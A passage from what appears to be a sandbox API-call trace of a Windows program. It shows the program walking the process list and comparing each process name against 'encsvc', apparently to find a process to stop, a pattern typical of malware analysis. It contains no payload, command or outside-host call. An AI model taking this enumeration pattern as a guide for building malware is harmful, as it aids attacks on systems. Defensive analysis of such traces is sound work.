lpSrch="encsvc") returned 0x0 [0094.617] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0094.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0094.618] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x356d0c8 [0094.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x356d0c8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Memory Compression", lpUsedDefaultChar=0x0) returned 19 [0094.618] lstrcpyA (in: lpString1=0x567fabc, lpString2="Memory Compression" | out: lpString1="Memory Compression") returned="Memory Compression" [0094.618] StrStrIA (lpFirst="Memory Compression", lpSrch="encsvc") returned 0x0 [0094.618] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0094.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0094.619] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x356d108 [0094.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x356d108, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 24 [0094.619] lstrcpyA (in: lpString1=0x567fabc, lpString2="ShellExperienceHost.exe" | out: lpString1="ShellExperienceHost.exe") returned="ShellExperienceHost.exe" [0094.619] StrStrIA (lpFirst="ShellExperienceHost.exe", lpSrch="encsvc") returned 0x0 [0094.619] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0094.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.620] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3572098 [0094.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x3572098, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 13 [0094.620] lstrcpyA (in: lpString1=0x567fabc, lpString2="SearchUI.exe" | out: lpString1="SearchUI.exe") returned="SearchUI.exe" [0094.620] StrStrIA (lpFirst="SearchUI.exe", lpSrch="encsvc") returned 0x0 [0094.620] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0094.621] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0094.621] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x356d148 [0094.621] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x356d148, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 18 [0094.621] lstrcpyA (in: lpString1=0x567fabc, lpString2="RuntimeBroker.exe" | out: lpString1="RuntimeBroker.exe") returned="RuntimeBroker.exe" [0094.621] StrStrIA (lpFirst="RuntimeBroker.exe", lpSrch="encsvc") returned 0x0 [0094.622] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0094.624] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.624] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3572308 [0094.624] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x3572308, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0094.624] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0094.624] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="encsvc") returned 0x0 [0094.624] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pending.exe")) returned 1 [0094.625] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.626] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3572140 [0094.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x3572140, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pending.exe", lpUsedDefaultChar=0x0) returned 12 [0094.626] lstrcpyA (in: lpString1=0x567fabc, lpString2="pending.exe" | out: lpString1="pending.exe") returned="pending.exe" [0094.626] StrStrIA (lpFirst="pending.exe", lpSrch="encsvc") returned 0x0 [0094.626] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="appointmentimpressed.exe")) returned 1 [0094.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0094.627] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x356a740 [0094.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x356a740, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="appointmentimpressed.exe", lpUsedDefaultChar=0x0) returned 25 [0094.627] lstrcpyA (in: lpString1=0x567fabc, lpString2="appointmentimpressed.exe" | out: lpString1="appointmentimpressed.exe") returned="appointmentimpressed.exe" [0094.627] StrStrIA (lpFirst="appointmentimpressed.exe", lpSrch="encsvc") returned 0x0 [0094.627] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="swing prefer.exe")) returned 1 [0094.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0094.657] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x356d168 [0094.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x356d168, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="swing prefer.exe", lpUsedDefaultChar=0x0) returned 17 [0094.657] lstrcpyA (in: lpString1=0x567fabc, lpString2="swing prefer.exe" | out: lpString1="swing prefer.exe") returned="swing prefer.exe" [0094.657] StrStrIA (lpFirst="swing prefer.exe", lpSrch="encsvc") returned 0x0 [0094.657] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="vietnamese_mature_hat.exe")) returned 1 [0094.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0094.658] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x356a470 [0094.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x356a470, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vietnamese_mature_hat.exe", lpUsedDefaultChar=0x0) returned 26 [0094.658] lstrcpyA (in: lpString1=0x567fabc, lpString2="vietnamese_mature_hat.exe" | out: lpString1="vietnamese_mature_hat.exe") returned="vietnamese_mature_hat.exe" [0094.658] StrStrIA (lpFirst="vietnamese_mature_hat.exe", lpSrch="encsvc") returned 0x0 [0094.658] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="nights-attending.exe")) returned 1 [0094.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0094.659] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x356ce48 [0094.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x356ce48, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nights-attending.exe", lpUsedDefaultChar=0x0) returned 21 [0094.659] lstrcpyA (in: lpString1=0x567fabc, lpString2="nights-attending.exe" | out: lpString1="nights-attending.exe") returned="nights-attending.exe" [0094.660] StrStrIA (lpFirst="nights-attending.exe", lpSrch="encsvc") returned 0x0 [0094.660] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="installed.exe")) returned 1 [0094.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0094.660] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35720e0 [0094.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x35720e0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="installed.exe", lpUsedDefaultChar=0x0) returned 14 [0094.661] lstrcpyA (in: lpString1=0x567fabc, lpString2="installed.exe" | out: lpString1="installed.exe") returned="installed.exe" [0094.661] StrStrIA (lpFirst="installed.exe", lpSrch="encsvc") returned 0x0 [0094.661] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="references compounds.exe")) returned 1 [0094.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0094.665] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x356a808 [0094.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x356a808, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="references compounds.exe", lpUsedDefaultChar=0x0) returned 25 [0094.665] lstrcpyA (in: lpString1=0x567fabc, lpString2="references compounds.exe" | out: lpString1="references compounds.exe") returned="references compounds.exe" [0094.665] StrStrIA (lpFirst="references compounds.exe", lpSrch="encsvc") returned 0x0 [0094.665] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="albuquerque_left.exe")) returned 1 [0094.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0094.667] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x356cd08 [0094.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x356cd08, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="albuquerque_left.exe", lpUsedDefaultChar=0x0) returned 21 [0094.667] lstrcpyA (in: lpString1=0x567fabc, lpString2="albuquerque_left.exe" | out: lpString1="albuquerque_left.exe") returned="albuquerque_left.exe" [0094.667] StrStrIA (lpFirst="albuquerque_left.exe", lpSrch="encsvc") returned 0x0 [0094.667] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="registered try.exe")) returned 1 [0094.668] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0094.668] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x356cfc8 [0094.668] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x356cfc8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="registered try.exe", lpUsedDefaultChar=0x0) returned 19 [0094.668] lstrcpyA (in: lpString1=0x567fabc, lpString2="registered try.exe" | out: lpString1="registered try.exe") returned="registered try.exe" [0094.668] StrStrIA (lpFirst="registered try.exe", lpSrch="encsvc") returned 0x0 [0094.668] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="consultancy statute ide.exe")) returned 1 [0094.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0094.669] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356a830 [0094.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x356a830, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="consultancy statute ide.exe", lpUsedDefaultChar=0x0) returned 28 [0094.669] lstrcpyA (in: lpString1=0x567fabc, lpString2="consultancy statute ide.exe" | out: lpString1="consultancy statute ide.exe") returned="consultancy statute ide.exe" [0094.669] StrStrIA (lpFirst="consultancy statute ide.exe", lpSrch="encsvc") returned 0x0 [0094.669] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x67c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="invite.exe")) returned 1 [0094.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0094.670] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35722c0 [0094.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x35722c0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="invite.exe", lpUsedDefaultChar=0x0) returned 11 [0094.670] lstrcpyA (in: lpString1=0x567fabc, lpString2="invite.exe" | out: lpString1="invite.exe") returned="invite.exe" [0094.670] StrStrIA (lpFirst="invite.exe", lpSrch="encsvc") returned 0x0 [0094.670] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="idol.exe")) returned 1 [0094.671] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0094.671] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x35721a0 [0094.671] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x35721a0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="idol.exe", lpUsedDefaultChar=0x0) returned 9 [0094.671] lstrcpyA (in: lpString1=0x567fabc, lpString2="idol.exe" | out: lpString1="idol.exe") returned="idol.exe" [0094.671] StrStrIA (lpFirst="idol.exe", lpSrch="encsvc") returned 0x0 [0094.671] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="latitude qualifications.exe")) returned 1 [0094.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0094.672] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356a650 [0094.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x356a650, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="latitude qualifications.exe", lpUsedDefaultChar=0x0) returned 28 [0094.672] lstrcpyA (in: lpString1=0x567fabc, lpString2="latitude qualifications.exe" | out: lpString1="latitude qualifications.exe") returned="latitude qualifications.exe" [0094.672] StrStrIA (lpFirst="latitude qualifications.exe", lpSrch="encsvc") returned 0x0 [0094.672] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="lauderdaletransmittedwasher.exe")) returned 1 [0094.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0094.673] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x356a880 [0094.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x356a880, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lauderdaletransmittedwasher.exe", lpUsedDefaultChar=0x0) returned 32 [0094.673] lstrcpyA (in: lpString1=0x567fabc, lpString2="lauderdaletransmittedwasher.exe" | out: lpString1="lauderdaletransmittedwasher.exe") returned="lauderdaletransmittedwasher.exe" [0094.673] StrStrIA (lpFirst="lauderdaletransmittedwasher.exe", lpSrch="encsvc") returned 0x0 [0094.673] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="powell_jane.exe")) returned 1 [0094.675] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0094.675] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3572278 [0094.675] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x3572278, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="powell_jane.exe", lpUsedDefaultChar=0x0) returned 16 [0094.675] lstrcpyA (in: lpString1=0x567fabc, lpString2="powell_jane.exe" | out: lpString1="powell_jane.exe") returned="powell_jane.exe" [0094.675] StrStrIA (lpFirst="powell_jane.exe", lpSrch="encsvc") returned 0x0 [0094.675] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="laboratorysaving.exe")) returned 1 [0094.676] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0094.676] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x356d028 [0094.676] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x356d028, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="laboratorysaving.exe", lpUsedDefaultChar=0x0) returned 21 [0094.676] lstrcpyA (in: lpString1=0x567fabc, lpString2="laboratorysaving.exe" | out: lpString1="laboratorysaving.exe") returned="laboratorysaving.exe" [0094.676] StrStrIA (lpFirst="laboratorysaving.exe", lpSrch="encsvc") returned 0x0 [0094.676] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x798, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gainedshape.exe")) returned 1 [0094.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0094.677] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x35720b0 [0094.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x35720b0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gainedshape.exe", lpUsedDefaultChar=0x0) returned 16 [0094.677] lstrcpyA (in: lpString1=0x567fabc, lpString2="gainedshape.exe" | out: lpString1="gainedshape.exe") returned="gainedshape.exe" [0094.677] StrStrIA (lpFirst="gainedshape.exe", lpSrch="encsvc") returned 0x0 [0094.677] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="opens-versions.exe")) returned 1 [0094.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0094.678] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x356d008 [0094.678] 